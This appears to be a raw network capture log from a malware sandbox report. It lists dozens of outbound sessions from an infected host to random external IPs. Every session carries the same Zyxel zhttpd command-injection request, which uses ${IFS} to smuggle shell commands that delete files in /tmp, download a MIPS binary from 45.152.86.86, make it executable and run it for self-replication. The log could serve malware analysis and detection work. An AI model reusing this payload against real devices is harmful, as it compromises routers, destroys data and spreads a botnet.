                              Mar 31, 2024 08:41:13.638607025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2285192.168.2.133711294.8.153.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638663054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2286192.168.2.1336574175.166.12.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638693094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2287192.168.2.134642059.185.170.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638761044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2288192.168.2.1339102169.211.12.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638782024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2289192.168.2.1340774124.248.66.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638812065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2290192.168.2.135538893.198.138.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638863087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2291192.168.2.135411865.36.115.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638916016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2292192.168.2.134786278.29.55.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.638962984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2293192.168.2.134324075.204.144.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639008999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2294192.168.2.134581069.191.121.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639025927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2295192.168.2.134050442.7.113.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639058113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2296192.168.2.1359174157.115.177.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639108896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2297192.168.2.135377617.178.240.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639166117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2298192.168.2.1333914121.238.17.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639206886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2299192.168.2.1345366121.148.90.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639226913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2300192.168.2.1351126154.86.166.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639283895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2301192.168.2.133594084.180.92.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639333963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2302192.168.2.1356346207.50.12.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639357090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2303192.168.2.1339110179.102.51.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639380932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2304192.168.2.1339186106.239.119.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639414072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2305192.168.2.1348102158.160.177.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639446020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2306192.168.2.1351178174.3.45.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639502048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2307192.168.2.1356960118.6.27.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639530897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2308192.168.2.133878078.211.6.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639565945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2309192.168.2.134719466.255.166.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639595032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2310192.168.2.1342916157.83.161.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639643908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2311192.168.2.1340358176.136.206.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639689922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2312192.168.2.1339332163.109.75.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639722109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2313192.168.2.1353312203.49.88.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639771938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2314192.168.2.1349066101.64.99.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639826059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2315192.168.2.1341288213.71.21.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639864922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2316192.168.2.1345990178.253.94.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639900923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2317192.168.2.133540835.68.243.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639946938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2318192.168.2.1339150164.22.155.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.639987946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2319192.168.2.1350608208.51.214.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640028000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2320192.168.2.1335052119.1.25.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640058041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2321192.168.2.1344400142.233.162.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640110016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2322192.168.2.13503508.51.93.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640144110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2323192.168.2.134360253.150.32.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640172005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2324192.168.2.134969442.126.174.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640207052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2325192.168.2.1358602181.134.252.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640248060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2326192.168.2.134937677.250.99.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640320063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2327192.168.2.1333008114.245.121.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640346050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2328192.168.2.133971877.157.209.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640367031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2329192.168.2.134892882.168.101.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640408039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2330192.168.2.1354188187.129.234.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640454054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2331192.168.2.1356608138.89.218.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640542030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2332192.168.2.1333630211.22.196.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640552998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2333192.168.2.1359182106.50.200.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640594959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2334192.168.2.133377617.237.245.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640645981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2335192.168.2.1350104111.101.34.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640686989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2336192.168.2.1352552103.38.78.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640717030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2337192.168.2.1350512125.129.145.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640777111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2338192.168.2.1333716212.204.163.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640829086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2339192.168.2.1352028202.221.251.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640865088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2340192.168.2.1352554129.48.54.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640918016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2341192.168.2.1340416115.206.168.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640944004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2342192.168.2.1355176176.26.245.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.640969992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2343192.168.2.135081824.169.230.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.641021967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2344192.168.2.1345734163.165.78.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.641073942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2345192.168.2.1342266103.246.37.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.641119957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2346192.168.2.135156299.121.72.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.641151905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2347192.168.2.1359998131.210.108.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.641206026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2348192.168.2.1342456168.84.6.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.641242981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2349192.168.2.134662496.67.9.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.641303062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2350192.168.2.133771232.163.179.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645195007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2351192.168.2.1334490150.84.58.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645234108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2352192.168.2.134066681.247.221.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:13.645272017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2353192.168.2.134481474.153.189.144443
                              TimestampBytes transferredDirectionData
